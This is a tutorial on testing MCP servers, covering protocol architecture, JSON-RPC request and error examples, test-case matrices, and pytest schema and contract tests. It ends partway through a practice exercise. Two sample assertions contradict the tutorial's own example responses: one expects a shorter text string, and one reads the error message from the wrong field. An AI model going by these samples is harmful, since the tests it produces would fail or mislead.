Interactive Tutorial

Testing & Validating MCP Servers

Welcome to the Workshop

This comprehensive tutorial is designed for QA Engineers and SDETs who want to master testing the Model Context Protocol (MCP). Whether you're transitioning from REST API testing or expanding your skillset into AI infrastructure, this workshop provides hands-on, production-grade knowledge.

What You'll Learn

  • Deep understanding of MCP architecture and protocol mechanics
  • Comprehensive test strategies specific to MCP servers
  • Hands-on implementation of functional, contract, and performance tests
  • Security testing techniques for AI tool orchestration
  • Real-world project: Build and test your own MCP server
  • Advanced observability and CI/CD integration patterns

Prerequisites

  • 2-8 years of QA/SDET experience
  • Strong understanding of REST APIs and JSON
  • Familiarity with automation frameworks (Pytest, Playwright, or REST Assured)
  • Basic knowledge of CI/CD pipelines
  • Understanding of test design principles
⏱ Duration

This workshop takes approximately 3-4 hours to complete. Each module builds on the previous one, so we recommend following the sequence.

Workshop Structure

| Module | Topic | Duration |
|---|---|---|
| Module 1 | Foundations of MCP | 45 min |
| Module 2 | QA & SDET Test Strategy | 60 min |
| Module 3 | Hands-On Project | 75 min |
| Module 4 | Advanced SDET Architecture | 30 min |
| Assessment | Final Quiz | 20 min |
🎯 Learning Approach

This tutorial emphasizes hands-on practice. You'll find interactive exercises, real code examples, and practical scenarios throughout. Don't just read: experiment with the code and concepts!

Module 1.1

What is MCP?

Formal Definition

Model Context Protocol (MCP) is an open protocol that standardizes how applications provide context to Large Language Models (LLMs). It enables AI applications to securely connect to diverse data sources and tools through a unified interface, solving the fragmentation problem in AI tool integration.

Why MCP Exists

Before MCP, every AI application built custom integrations for each tool, database, or API:

❌ THE OLD WAY:

Claude App → Custom Slack Integration
Claude App → Custom GitHub Integration
Claude App → Custom Database Integration
ChatGPT    → Different Custom Integrations (no reuse)

Problems this created:

  • Duplicate engineering effort across every AI platform
  • No standardization or interoperability
  • Security inconsistencies between implementations
  • Difficult to maintain and version
  • Zero code reuse between platforms
✅ WITH MCP:

Any AI App → MCP Protocol → MCP Server (Slack)
Any AI App → MCP Protocol → MCP Server (GitHub)
Any AI App → MCP Protocol → MCP Server (Database)

The N × M Problem

MCP solves the fundamental scaling problem in AI tool integration:

  • Without MCP: N AI applications × M tools = N × M custom integrations
  • With MCP: N clients + M servers = N + M implementations
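The scaling claim above is easy to sanity-check with a couple of lines (the numbers plugged in are purely illustrative):

```python
def integrations_without_mcp(n_apps: int, m_tools: int) -> int:
    # Every AI app ships its own custom integration for every tool.
    return n_apps * m_tools

def integrations_with_mcp(n_apps: int, m_tools: int) -> int:
    # Each app implements one MCP client; each tool ships one MCP server.
    return n_apps + m_tools

# 5 AI applications, 20 tools:
print(integrations_without_mcp(5, 20))  # 100 custom integrations
print(integrations_with_mcp(5, 20))     # 25 implementations
```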
💡 Key Insight for QA

This architectural shift means you're no longer testing just API endpoints: you're testing a bidirectional protocol with dynamic capability negotiation, persistent sessions, and stateful interactions.

MCP vs REST/GraphQL

| Aspect | REST/GraphQL | MCP |
|---|---|---|
| Purpose | General API communication | LLM-context delivery |
| Discovery | Static OpenAPI/Schema | Dynamic capability negotiation |
| Session Model | Stateless (REST) | Persistent bidirectional session |
| Tool Schema | Not standardized | JSON Schema for tools |
| Transport | HTTP only | stdio, HTTP+SSE, WebSocket |
| Context Flow | Request → Response | Resources + Tools + Prompts |

Real-World Use Cases

1. Enterprise Knowledge Assistant

MCP Server connects to:
├── Confluence (documentation)
├── JIRA (project tracking)
├── Slack (team communication)
└── Git (code repositories)

AI can query across all systems simultaneously.

QA Challenge: Validate cross-system data consistency

2. DevOps AI Agent

MCP Server exposes tools for:
├── Deploy application
├── Rollback deployment
├── Check logs
└── Monitor metrics

AI orchestrates the entire deployment pipeline.

QA Challenge: Test rollback scenarios and error handling

3. Customer Support Bot

MCP Server provides access to:
├── CRM data (customer history)
├── Ticketing API (support tickets)
└── Knowledge base (solutions)

AI resolves tickets with full context.

QA Challenge: Validate PII handling and security boundaries

🧪 Reflection Exercise

Question: Think about your current testing work. What's one API or system you test that could benefit from MCP standardization?

Consider:

  • How would dynamic capability negotiation change your test approach?
  • What new test scenarios would emerge?
  • How would stateful sessions impact your test data management?
Module 1.2

MCP Architecture Deep Dive

High-Level Architecture

┌─────────────┐              ┌─────────────┐
│  AI Client  │ ◄──────────► │ MCP Server  │
│   (Claude)  │ MCP Protocol │             │
└─────────────┘              └──────┬──────┘
                                    │
                ┌───────────────────┼───────────────────┐
                │                   │                   │
           ┌────▼────┐         ┌────▼────┐         ┌────▼────┐
           │  Tools  │         │Resources│         │ Prompts │
           │ • calc  │         │ • files │         │ • expl  │
           │ • API   │         │ • DB    │         │ • fix   │
           └─────────┘         └─────────┘         └─────────┘

Protocol Components

1. Client (AI Application)

  • Initiates connection to MCP server
  • Discovers available capabilities
  • Invokes tools and fetches resources
  • Manages session lifecycle

2. MCP Server

  • Exposes tools, resources, and prompts
  • Handles capability negotiation
  • Executes tool requests
  • Manages state and context

3. Transport Layer

MCP supports three transport mechanisms:

| Transport | Use Case | Testing Focus |
|---|---|---|
| stdio | Local processes | Process lifecycle, I/O streams |
| HTTP+SSE | Remote servers | Connection handling, retries |
| WebSocket | Real-time bidirectional | Connection stability, reconnection |

Request Lifecycle Walkthrough

Step 1: Connection Initialization
  Client → Server: Initialize request
  Server → Client: Server capabilities

Step 2: Capability Discovery
  Client → Server: List available tools
  Server → Client: Tool schemas

Step 3: Tool Invocation
  Client → Server: Call tool with parameters
  Server: Execute tool logic
  Server → Client: Return result

Step 4: Error Handling (if needed)
  Server → Client: Error response with details

Example: Initialize Request

{
  "jsonrpc": "2.0",
  "id": 1,
  "method": "initialize",
  "params": {
    "protocolVersion": "2024-11-05",
    "capabilities": {
      "roots": {
        "listChanged": true
      },
      "sampling": {}
    },
    "clientInfo": {
      "name": "TestClient",
      "version": "1.0.0"
    }
  }
}

Example: Server Response

{
  "jsonrpc": "2.0",
  "id": 1,
  "result": {
    "protocolVersion": "2024-11-05",
    "capabilities": {
      "logging": {},
      "prompts": {
        "listChanged": true
      },
      "resources": {
        "subscribe": true,
        "listChanged": true
      },
      "tools": {
        "listChanged": true
      }
    },
    "serverInfo": {
      "name": "ExampleServer",
      "version": "1.0.0"
    }
  }
}
πŸ” Testing Insight

The initialization handshake is critical. Your tests must validate:

  • Protocol version compatibility
  • Capability negotiation correctness
  • Proper error handling for mismatched versions
  • Timeout behavior for unresponsive servers
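The handshake checks above can be expressed as a small validator. The `check_initialize_response` helper and the hard-coded response fixture below are illustrative sketches, not part of any MCP SDK:

```python
def check_initialize_response(response: dict, supported_versions: set) -> list:
    """Return a list of handshake problems; an empty list means the response passes."""
    problems = []
    result = response.get("result", {})
    version = result.get("protocolVersion")
    if version not in supported_versions:
        problems.append(f"unsupported protocolVersion: {version}")
    if "capabilities" not in result:
        problems.append("missing capabilities")
    if "serverInfo" not in result:
        problems.append("missing serverInfo")
    return problems

# Fixture modeled on the server response shown above.
response = {
    "jsonrpc": "2.0",
    "id": 1,
    "result": {
        "protocolVersion": "2024-11-05",
        "capabilities": {"tools": {"listChanged": True}},
        "serverInfo": {"name": "ExampleServer", "version": "1.0.0"},
    },
}

assert check_initialize_response(response, {"2024-11-05"}) == []
assert check_initialize_response(response, {"2025-03-26"}) == [
    "unsupported protocolVersion: 2024-11-05"
]
```

In a real suite, the fixture would be replaced by the live response from your client's initialize call, and the version set by whatever your client actually supports.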

Data Flow Architecture

Request Flow:
═════════════

Client                        MCP Server                Backend
  │                               │                        │
  │ 1. List Tools                 │                        │
  ├──────────────────────────────►│                        │
  │                               │                        │
  │ 2. Tool Schemas               │                        │
  │◄──────────────────────────────┤                        │
  │                               │                        │
  │ 3. Call Tool(params)          │                        │
  ├──────────────────────────────►│                        │
  │                               │ 4. Execute Logic       │
  │                               ├───────────────────────►│
  │                               │                        │
  │                               │ 5. Return Data         │
  │                               │◄───────────────────────┤
  │ 6. Tool Result                │                        │
  │◄──────────────────────────────┤                        │
🧪 Architecture Challenge

Scenario: An MCP server connects to three different databases: PostgreSQL, MongoDB, and Redis.

Questions:

  1. How would you test connection failure to one database while others succeed?
  2. What happens if the MCP server crashes mid-request? How should your tests detect this?
  3. If the client disconnects, should the MCP server clean up database connections immediately or wait?

Think about: Connection pooling, resource cleanup, graceful degradation

Module 1.3

Key MCP Concepts

Core Primitives

MCP defines three primary primitives that servers can expose:

1. Tools

Definition: Executable functions that the AI can call to perform actions or retrieve computed data.

{
  "name": "calculate_discount",
  "description": "Calculate discounted price based on original price and discount percentage",
  "inputSchema": {
    "type": "object",
    "properties": {
      "original_price": {
        "type": "number",
        "description": "Original price before discount"
      },
      "discount_percent": {
        "type": "number",
        "description": "Discount percentage (0-100)",
        "minimum": 0,
        "maximum": 100
      }
    },
    "required": ["original_price", "discount_percent"]
  }
}

Testing Focus:

  • Schema validation (are all required fields defined?)
  • Input boundary testing (min/max values)
  • Type validation (what if a string is passed for a number?)
  • Required field enforcement

2. Resources

Definition: Data sources that provide context to the AI, such as files, database queries, or API responses.

{
  "uri": "file:///docs/api-reference.md",
  "name": "API Reference Documentation",
  "description": "Complete API documentation for the product",
  "mimeType": "text/markdown"
}

Testing Focus:

  • URI format validation
  • Resource availability (404 handling)
  • MIME type correctness
  • Large resource handling (timeouts, streaming)
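The first three checks can be sketched directly. The allow-list of URI schemes and the helper name below are illustrative assumptions, not mandated by MCP:

```python
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"file", "https"}  # illustrative policy, not from the MCP spec

def validate_resource_descriptor(resource: dict) -> list:
    """Basic structural checks for a resource entry like the example above."""
    problems = []
    scheme = urlparse(resource.get("uri", "")).scheme
    if scheme not in ALLOWED_SCHEMES:
        problems.append(f"unexpected URI scheme: {scheme!r}")
    if not resource.get("name"):
        problems.append("missing name")
    if "/" not in resource.get("mimeType", ""):
        problems.append("mimeType is not type/subtype")
    return problems

resource = {
    "uri": "file:///docs/api-reference.md",
    "name": "API Reference Documentation",
    "mimeType": "text/markdown",
}
assert validate_resource_descriptor(resource) == []
assert validate_resource_descriptor({"uri": "ftp://host/x"}) == [
    "unexpected URI scheme: 'ftp'", "missing name", "mimeType is not type/subtype"
]
```

Availability (404 handling) and large-resource behavior need a live server and are better exercised in integration tests.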

3. Prompts

Definition: Reusable prompt templates that guide AI interactions.

{
  "name": "code_review",
  "description": "Review code for bugs and improvements",
  "arguments": [
    {
      "name": "code",
      "description": "Code to review",
      "required": true
    },
    {
      "name": "language",
      "description": "Programming language",
      "required": true
    }
  ]
}

Tool Execution Example

Request: Calling a Tool

{
  "jsonrpc": "2.0",
  "id": 2,
  "method": "tools/call",
  "params": {
    "name": "calculate_discount",
    "arguments": {
      "original_price": 100.00,
      "discount_percent": 20
    }
  }
}

Response: Successful Execution

{
  "jsonrpc": "2.0",
  "id": 2,
  "result": {
    "content": [
      {
        "type": "text",
        "text": "Discounted price: $80.00 (20% off $100.00)"
      }
    ]
  }
}

Response: Error Case

{
  "jsonrpc": "2.0",
  "id": 2,
  "error": {
    "code": -32602,
    "message": "Invalid params",
    "data": {
      "details": "discount_percent must be between 0 and 100, got 150"
    }
  }
}

Error Handling Strategy

| Error Code | Meaning | Test Scenario |
|---|---|---|
| -32700 | Parse error | Send malformed JSON |
| -32600 | Invalid request | Missing required fields |
| -32601 | Method not found | Call non-existent tool |
| -32602 | Invalid params | Wrong parameter types |
| -32603 | Internal error | Server crash simulation |
⚠️ Critical Testing Point

Error codes must be consistent and predictable. Your test suite should verify that the server returns the correct error code for each failure scenario. Don't just check that an error occurred; validate the specific error code and message.
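One way to keep these checks table-driven: the scenario names and the response fixture below are invented for illustration, while the codes themselves are the standard JSON-RPC codes from the table above.

```python
# Expected JSON-RPC error codes per failure scenario (from the table above).
EXPECTED_CODES = {
    "parse_error": -32700,
    "invalid_request": -32600,
    "method_not_found": -32601,
    "invalid_params": -32602,
    "internal_error": -32603,
}

def assert_error_response(response: dict, scenario: str) -> None:
    """Fail unless the response carries the specific code for this scenario."""
    assert "error" in response, "expected an error response"
    assert "result" not in response, "error responses must not also carry a result"
    expected = EXPECTED_CODES[scenario]
    actual = response["error"]["code"]
    assert actual == expected, f"{scenario}: expected {expected}, got {actual}"
    assert response["error"].get("message"), "error message must be non-empty"

# Hand-written fixture: the server rejected an out-of-range parameter.
rejection = {
    "jsonrpc": "2.0",
    "id": 2,
    "error": {"code": -32602, "message": "Invalid params"},
}
assert_error_response(rejection, "invalid_params")
```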

Edge Cases to Test

1. Boundary Values
   - Maximum string length
   - Minimum/maximum numbers
   - Empty arrays
   - Null values

2. Type Coercion
   - String "100" vs number 100
   - Boolean true vs string "true"
   - undefined vs null

3. Unicode and Special Characters
   - Emoji in tool names
   - Non-ASCII characters
   - Control characters

4. Concurrent Requests
   - Multiple tool calls simultaneously
   - Race conditions in stateful operations
   - Resource locking

5. Timeout Scenarios
   - Long-running tool execution
   - Network delays
   - Database query timeouts

🧪 Practice: Schema Validation

Consider this tool schema:

{
  "name": "send_email",
  "inputSchema": {
    "type": "object",
    "properties": {
      "to": {
        "type": "string",
        "format": "email"
      },
      "subject": {
        "type": "string",
        "maxLength": 100
      },
      "body": {
        "type": "string"
      },
      "attachments": {
        "type": "array",
        "items": {
          "type": "string"
        },
        "maxItems": 5
      }
    },
    "required": ["to", "subject", "body"]
  }
}

Design 5 test cases:

  1. One positive test case
  2. Four negative test cases targeting different validation rules

Hint: Think about email format, length limits, required fields, and array constraints.

Module 2.1

What Must Be Tested?

Comprehensive Testing Checklist

Testing an MCP server requires a multi-layered approach. Unlike REST APIs where you primarily test endpoints, MCP testing involves protocol compliance, capability negotiation, and stateful interactions.

1. Tool Registration Validation

What to verify:

  • All tools are properly registered during initialization
  • Tool schemas match JSON Schema specification
  • Tool names are unique and follow naming conventions
  • Descriptions are clear and accurate
Test Case: Duplicate Tool Names
Given: MCP server with two tools named "calculate"
When: Server initializes
Then: Should reject with error OR rename with suffix
Expected: Clear error message indicating duplicate tool name

2. Schema Validation

Critical validations:

| Validation Type | Test Approach | Example |
|---|---|---|
| Type Checking | Pass wrong types | String instead of number |
| Required Fields | Omit required params | Missing "email" field |
| Format Validation | Invalid formats | "not-an-email" for email field |
| Range Validation | Boundary testing | 101 for 0-100 range |
| Pattern Matching | Regex violations | "ABC" for "[0-9]+" pattern |

3. Capability Exposure

During initialization, servers declare their capabilities. Test that:

{
  "capabilities": {
    "logging": {},            // Can send logs to client
    "prompts": {              // Can provide prompts
      "listChanged": true     // Notifies on prompt list changes
    },
    "resources": {            // Can provide resources
      "subscribe": true,      // Supports resource subscriptions
      "listChanged": true     // Notifies on resource list changes
    },
    "tools": {                // Can provide tools
      "listChanged": true     // Notifies on tool list changes
    }
  }
}

Test scenarios:

  • Server claims the "tools" capability → must respond to tools/list
  • Server claims "listChanged: true" → must emit notifications
  • Server lacks the "resources" capability → must reject resources/list
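The capability-to-method mapping behind these scenarios can be encoded directly. The method subset below is an illustrative sketch, not the full MCP method catalogue:

```python
# Methods unlocked by each declared capability (illustrative subset).
CAPABILITY_METHODS = {
    "tools": {"tools/list", "tools/call"},
    "resources": {"resources/list", "resources/read"},
    "prompts": {"prompts/list", "prompts/get"},
}

def method_allowed(declared: dict, method: str) -> bool:
    """A request is valid only if the server declared the matching capability."""
    for capability, methods in CAPABILITY_METHODS.items():
        if method in methods:
            return capability in declared
    return False  # unknown method: never allowed

# Server that declared only "tools" and "logging" during initialization:
caps = {"tools": {"listChanged": True}, "logging": {}}
assert method_allowed(caps, "tools/call") is True
assert method_allowed(caps, "resources/list") is False  # capability not declared
```

A test suite can iterate this table against the live server: every allowed method must succeed, every disallowed one must be rejected.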

4. Tool Execution Logic

The core functional testing area:

For each tool, test:

✓ Happy Path
  - Valid inputs
  - Expected outputs
  - Correct data types in response

✓ Edge Cases
  - Boundary values (min/max)
  - Empty inputs
  - Null/undefined values
  - Special characters

✓ Error Conditions
  - Invalid inputs
  - Missing required fields
  - Type mismatches
  - Business logic violations

✓ State Management
  - Does tool modify state?
  - Can it be called repeatedly?
  - Are state changes idempotent?

5. Error Handling Behavior

🎯 Testing Principle

Good error handling is predictable, informative, and consistent. Every error should return:

  • Correct error code
  • Clear error message
  • Actionable details (what went wrong, how to fix)
  • No sensitive information leakage

6. Timeout Behavior

Test how the server handles long-running operations:

Scenario 1: Tool execution exceeds timeout
  Given: Tool takes 60s to execute
  When: Client timeout is 30s
  Then: Client receives timeout error
  And: Server should cancel/clean up the operation

Scenario 2: Network timeout
  Given: Client-server connection is unstable
  When: Request is sent
  Then: Implement retry logic OR fail gracefully

Scenario 3: Database query timeout
  Given: Tool queries slow database
  When: Query exceeds timeout
  Then: Return specific timeout error
  And: Don't crash the server
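Scenario 1 can be simulated in-process. This is a minimal sketch of client-side deadline enforcement; `slow_tool` uses short sleeps to stand in for a long tool execution, and the wrapper name is invented for illustration:

```python
import concurrent.futures
import time

def call_tool_with_timeout(tool, timeout_s: float) -> dict:
    """Run a tool call in a worker thread and enforce a client-side timeout."""
    with concurrent.futures.ThreadPoolExecutor(max_workers=1) as pool:
        future = pool.submit(tool)
        try:
            return {"result": future.result(timeout=timeout_s)}
        except concurrent.futures.TimeoutError:
            # Client-side deadline hit; server-side cancellation/cleanup
            # is a separate test concern.
            return {"error": {"code": -32603, "message": "tool call timed out"}}

def slow_tool():
    time.sleep(0.2)  # stands in for a 60s tool execution
    return "done"

assert "error" in call_tool_with_timeout(slow_tool, timeout_s=0.05)
assert call_tool_with_timeout(slow_tool, timeout_s=1.0) == {"result": "done"}
```

Against a real server you would drive the same pattern through your MCP client's request timeout, then assert the server releases the underlying resources.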

7. Concurrency Handling

MCP servers must handle multiple simultaneous requests:

| Test Type | Scenario | Expected Behavior |
|---|---|---|
| Parallel Tools | Call 10 different tools simultaneously | All succeed independently |
| Same Tool | Call same tool 10 times concurrently | All execute correctly, no race conditions |
| Resource Lock | Two tools accessing same database | Proper locking, no deadlocks |
| State Modification | Concurrent writes to shared state | Consistent final state |
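The "same tool, many concurrent calls" row can be exercised in-process. The counter tool here is an invented stand-in for any stateful tool; the lock is what makes the final state consistent:

```python
import concurrent.futures
import threading

counter = 0
lock = threading.Lock()

def increment_tool() -> int:
    """A deliberately stateful 'tool'; the lock prevents lost updates."""
    global counter
    with lock:
        counter += 1
        return counter

# Fire 100 concurrent calls at the same tool.
with concurrent.futures.ThreadPoolExecutor(max_workers=10) as pool:
    results = list(pool.map(lambda _: increment_tool(), range(100)))

# Every call observed a distinct state and no updates were lost.
assert counter == 100
assert sorted(results) == list(range(1, 101))
```

Removing the lock is a useful mutation test: the assertions should then fail intermittently, which is exactly the race condition the table warns about.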

8. State Management

Questions to answer through testing:

  • Is the server stateful or stateless?
  • How is session state maintained?
  • What happens if the client reconnects?
  • Are there memory leaks with long-running sessions?
  • How is state cleaned up after client disconnection?

9. Backward Compatibility

As servers evolve, test that changes don't break existing clients:

Version 1.0:
{
  "name": "get_user",
  "params": {
    "user_id": "string"
  }
}

Version 2.0:
{
  "name": "get_user",
  "params": {
    "user_id": "string",
    "include_metadata": "boolean"  // NEW optional field
  }
}

Test: A V1 client calling a V2 server should still work.
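That compatibility rule can be checked mechanically. The parameter table below mirrors the hypothetical `get_user` v2 schema above; the helper name is invented for illustration:

```python
# v2 parameter table for get_user (mirrors the example above).
V2_PARAMS = {
    "user_id": {"type": "string", "required": True},
    "include_metadata": {"type": "boolean", "required": False},  # new in 2.0
}

def v1_request_still_valid(arguments: dict) -> bool:
    """The change is backward compatible iff every v1-shaped request still validates."""
    for name, spec in V2_PARAMS.items():
        if spec["required"] and name not in arguments:
            return False
    # No unknown parameters either.
    return all(name in V2_PARAMS for name in arguments)

assert v1_request_still_valid({"user_id": "u-123"}) is True  # v1-shaped request
assert v1_request_still_valid({}) is False                   # missing required field
```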
🧪 Design a Test Suite

Scenario: You're testing an MCP server that exposes a "weather_forecast" tool.

{
  "name": "weather_forecast",
  "inputSchema": {
    "type": "object",
    "properties": {
      "location": {
        "type": "string"
      },
      "days": {
        "type": "integer",
        "minimum": 1,
        "maximum": 7
      },
      "units": {
        "type": "string",
        "enum": ["celsius", "fahrenheit"]
      }
    },
    "required": ["location", "days"]
  }
}

Your Task: List 10 specific test cases covering:

  • 3 positive tests
  • 5 negative tests
  • 2 edge case tests
Module 2.2

Functional Testing Strategy

Test Case Design Framework

Functional testing for MCP servers follows a structured approach that goes beyond simple API testing. You're validating protocol compliance, tool behavior, and integration logic.

Test Case Template

| Field | Description | Example |
|---|---|---|
| Test ID | Unique identifier | MCP-TC-001 |
| Category | Type of test | Tool Execution |
| Priority | Critical/High/Medium/Low | Critical |
| Preconditions | Setup requirements | Server initialized |
| Test Steps | Detailed actions | 1. Call tool 2. Verify response |
| Test Data | Input parameters | { "price": 100, "discount": 20 } |
| Expected Result | What should happen | Returns discounted price $80 |
| Actual Result | What actually happened | Pass/Fail with details |

Comprehensive Test Scenarios

Example: Testing "calculate_discount" Tool

| Test ID | Scenario | Input | Expected Output | Type |
|---|---|---|---|---|
| TC-001 | Valid calculation | price: 100, discount: 20 | 80.00 | Positive |
| TC-002 | Zero discount | price: 100, discount: 0 | 100.00 | Boundary |
| TC-003 | 100% discount | price: 100, discount: 100 | 0.00 | Boundary |
| TC-004 | Negative price | price: -50, discount: 20 | Error: Invalid price | Negative |
| TC-005 | Discount > 100 | price: 100, discount: 150 | Error: Invalid discount | Negative |
| TC-006 | Missing field | price: 100 | Error: Missing discount | Negative |
| TC-007 | Wrong type | price: "hundred", discount: 20 | Error: Invalid type | Negative |
| TC-008 | Decimal precision | price: 99.99, discount: 33.33 | 66.66 | Edge Case |
| TC-009 | Very large number | price: 999999999, discount: 50 | 499999999.50 | Edge Case |
| TC-010 | Extra fields | price: 100, discount: 20, extra: "test" | 80.00 (ignore extra) | Edge Case |
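A reference implementation makes the matrix executable. This sketch assumes the rounding and validation semantics implied by the expected outputs above; a real server's behavior is what the tests would actually pin down:

```python
def calculate_discount(original_price, discount_percent) -> float:
    """Reference implementation of the tool under test (assumed semantics)."""
    for value in (original_price, discount_percent):
        if isinstance(value, bool) or not isinstance(value, (int, float)):
            raise TypeError("parameters must be numbers")
    if original_price < 0:
        raise ValueError("Invalid price")
    if not 0 <= discount_percent <= 100:
        raise ValueError("Invalid discount")
    return round(original_price * (1 - discount_percent / 100), 2)

# TC-001..TC-003, TC-008, TC-009 from the matrix:
assert calculate_discount(100, 20) == 80.00
assert calculate_discount(100, 0) == 100.00
assert calculate_discount(100, 100) == 0.00
assert calculate_discount(99.99, 33.33) == 66.66
assert calculate_discount(999999999, 50) == 499999999.50

# TC-005: discount > 100 must raise, not silently clamp.
try:
    calculate_discount(100, 150)
    raise AssertionError("expected ValueError")
except ValueError:
    pass
```

With `pytest.mark.parametrize`, the same table drives one test function per row instead of inline assertions.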

Validation Checklist

For Every Tool Test:

□ Response Structure
  ✓ Correct JSON-RPC format
  ✓ Proper ID matching request
  ✓ Result or error field (not both)

□ Data Validation
  ✓ Correct data types
  ✓ Required fields present
  ✓ Enum values valid
  ✓ Format specifications met

□ Error Handling
  ✓ Appropriate error code
  ✓ Clear error message
  ✓ Error details provided
  ✓ No stack traces to client

□ Performance
  ✓ Response time < threshold
  ✓ No memory leaks
  ✓ Proper resource cleanup

□ Side Effects
  ✓ State changes as expected
  ✓ Idempotency maintained
  ✓ No unintended modifications

Positive vs Negative Testing

Positive Tests (Expected Success)

# Example: Pytest test case
def test_calculate_discount_valid_input():
    """Test discount calculation with valid inputs"""
    request = {
        "jsonrpc": "2.0",
        "id": 1,
        "method": "tools/call",
        "params": {
            "name": "calculate_discount",
            "arguments": {
                "original_price": 100.00,
                "discount_percent": 20
            }
        }
    }

    response = client.send(request)

    assert response["jsonrpc"] == "2.0"
    assert response["id"] == 1
    assert "result" in response
    assert response["result"]["content"][0]["text"] == "Discounted price: $80.00"

Negative Tests (Expected Failure)

def test_calculate_discount_invalid_discount():
    """Test that discount > 100 returns error"""
    request = {
        "jsonrpc": "2.0",
        "id": 2,
        "method": "tools/call",
        "params": {
            "name": "calculate_discount",
            "arguments": {
                "original_price": 100.00,
                "discount_percent": 150  # Invalid!
            }
        }
    }

    response = client.send(request)

    assert "error" in response
    assert response["error"]["code"] == -32602  # Invalid params
    assert "must be between 0 and 100" in response["error"]["message"]

Schema Validation Examples

import jsonschema
import pytest

def test_tool_schema_compliance():
    """Verify tool schema is valid JSON Schema"""
    tool_schema = {
        "name": "send_notification",
        "inputSchema": {
            "type": "object",
            "properties": {
                "message": {
                    "type": "string",
                    "maxLength": 500
                },
                "priority": {
                    "type": "string",
                    "enum": ["low", "medium", "high"]
                },
                "recipients": {
                    "type": "array",
                    "items": {
                        "type": "string",
                        "format": "email"
                    },
                    "minItems": 1,
                    "maxItems": 10
                }
            },
            "required": ["message", "recipients"]
        }
    }

    # Validate the schema itself is valid JSON Schema
    try:
        jsonschema.Draft7Validator.check_schema(tool_schema["inputSchema"])
    except jsonschema.SchemaError as e:
        pytest.fail(f"Invalid schema: {e}")

    # Test valid input
    valid_input = {
        "message": "Test notification",
        "priority": "high",
        "recipients": ["[email protected]"]
    }
    jsonschema.validate(valid_input, tool_schema["inputSchema"])

    # Test invalid input
    invalid_input = {
        "message": "x" * 501,  # Exceeds maxLength
        "recipients": []       # Violates minItems
    }
    with pytest.raises(jsonschema.ValidationError):
        jsonschema.validate(invalid_input, tool_schema["inputSchema"])

🧪 Build Your Test Matrix

Tool Specification:

{
  "name": "create_user",
  "inputSchema": {
    "type": "object",
    "properties": {
      "username": {
        "type": "string",
        "pattern": "^[a-z0-9_]{3,20}$"
      },
      "email": {
        "type": "string",
        "format": "email"
      },
      "age": {
        "type": "integer",
        "minimum": 18,
        "maximum": 120
      },
      "role": {
        "type": "string",
        "enum": ["user", "admin", "moderator"]
      }
    },
    "required": ["username", "email"]
  }
}

Task: Create a complete test matrix with:

  • At least 5 positive test cases
  • At least 8 negative test cases
  • 3 boundary value tests

Think about: Pattern matching, email validation, integer boundaries, enum values, required fields

Module 2.3

Contract Testing

What is Contract Testing?

Contract testing verifies that the MCP server adheres to its published interface contract. Unlike functional testing (which tests behavior), contract testing ensures the API structure, data types, and protocol compliance remain consistent across versions.

🎯 Key Principle

Contract tests answer: "Does the server do what it promised in its schema?"

Why Contract Testing Matters for MCP

  • Version Compatibility: Clients depend on stable contracts
  • Breaking Change Detection: Catch incompatible changes early
  • Documentation Validation: Ensure docs match reality
  • Consumer-Driven: Protect clients from server changes

JSON Schema Validation

Tool Schema Contract

import jsonschema
import pytest

def test_tool_list_contract():
    """Verify tools/list response matches expected contract"""
    # Expected contract for tools/list response
    expected_schema = {
        "type": "object",
        "properties": {
            "jsonrpc": {"const": "2.0"},
            "id": {"type": ["number", "string"]},
            "result": {
                "type": "object",
                "properties": {
                    "tools": {
                        "type": "array",
                        "items": {
                            "type": "object",
                            "properties": {
                                "name": {"type": "string"},
                                "description": {"type": "string"},
                                "inputSchema": {"type": "object"}
                            },
                            "required": ["name", "inputSchema"]
                        }
                    }
                },
                "required": ["tools"]
            }
        },
        "required": ["jsonrpc", "id", "result"]
    }

    # Make actual request
    response = client.list_tools()

    # Validate against contract
    try:
        jsonschema.validate(response, expected_schema)
    except jsonschema.ValidationError as e:
        pytest.fail(f"Contract violation: {e.message}")

Snapshot Testing

Snapshot testing captures the current API response and compares future responses against it. This catches unintended changes.

import json
import pytest

def test_calculate_discount_response_snapshot(snapshot):
    """Ensure response structure hasn't changed"""
    request = {
        "jsonrpc": "2.0",
        "id": 1,
        "method": "tools/call",
        "params": {
            "name": "calculate_discount",
            "arguments": {
                "original_price": 100,
                "discount_percent": 20
            }
        }
    }

    response = client.send(request)

    # Remove dynamic fields for comparison
    response_snapshot = {
        "jsonrpc": response["jsonrpc"],
        "id": response["id"],
        "result": {
            "content": response["result"]["content"]
        }
    }

    # Compare with stored snapshot
    snapshot.assert_match(json.dumps(response_snapshot, indent=2), "discount_response.json")

Protocol Versioning Impact

Change Type Breaking? Contract Test Strategy
Add new tool ❌ No Verify tool list grows
Remove existing tool ✅ Yes Block in CI/CD
Add optional parameter ❌ No Verify backward compatibility
Add required parameter ✅ Yes Block in CI/CD
Change parameter type ✅ Yes Block in CI/CD
Change error code ✅ Yes Version bump required
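A breaking change such as tool removal can be caught in CI/CD with a baseline comparison. A minimal sketch, where the stored baseline list and tool names are illustrative assumptions, not part of the MCP SDK:

```python
# Baseline tool names captured from a previous release (illustrative)
BASELINE_TOOLS = {"calculate_discount", "currency_converter"}

def check_no_tools_removed(current_tools: list) -> set:
    """Return the set of baseline tools missing from the current tool list."""
    current_names = {tool["name"] for tool in current_tools}
    return BASELINE_TOOLS - current_names

# New tools are fine (non-breaking); removed tools should fail the build
current = [
    {"name": "calculate_discount"},
    {"name": "currency_converter"},
    {"name": "weather_forecast"},  # newly added, non-breaking
]
missing = check_no_tools_removed(current)
assert not missing, f"Breaking change: tools removed: {missing}"
```

Running this check against each build's `tools/list` output turns the "Block in CI/CD" rows of the table into an automated gate.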

Consumer-Driven Contract Testing

In consumer-driven testing, clients define their expectations (contracts), and the server must satisfy them.

# consumer_contract.yaml
interactions:
  - description: Calculate discount for valid input
    request:
      method: tools/call
      params:
        name: calculate_discount
        arguments:
          original_price: 100
          discount_percent: 20
    response:
      status: success
      body:
        matchingRules:
          "$.result.content[0].type":
            match: "type"
            value: "string"
          "$.result.content[0].text":
            match: "regex"
            regex: "Discounted price: \\$\\d+\\.\\d{2}"

        

🧪 Practice: Define a Contract

Scenario: You're testing a "currency_converter" tool.

{
    "name": "currency_converter",
    "inputSchema": {
        "type": "object",
        "properties": {
            "amount": {"type": "number", "minimum": 0},
            "from_currency": {"type": "string", "pattern": "^[A-Z]{3}$"},
            "to_currency": {"type": "string", "pattern": "^[A-Z]{3}$"}
        },
        "required": ["amount", "from_currency", "to_currency"]
    }
}

        

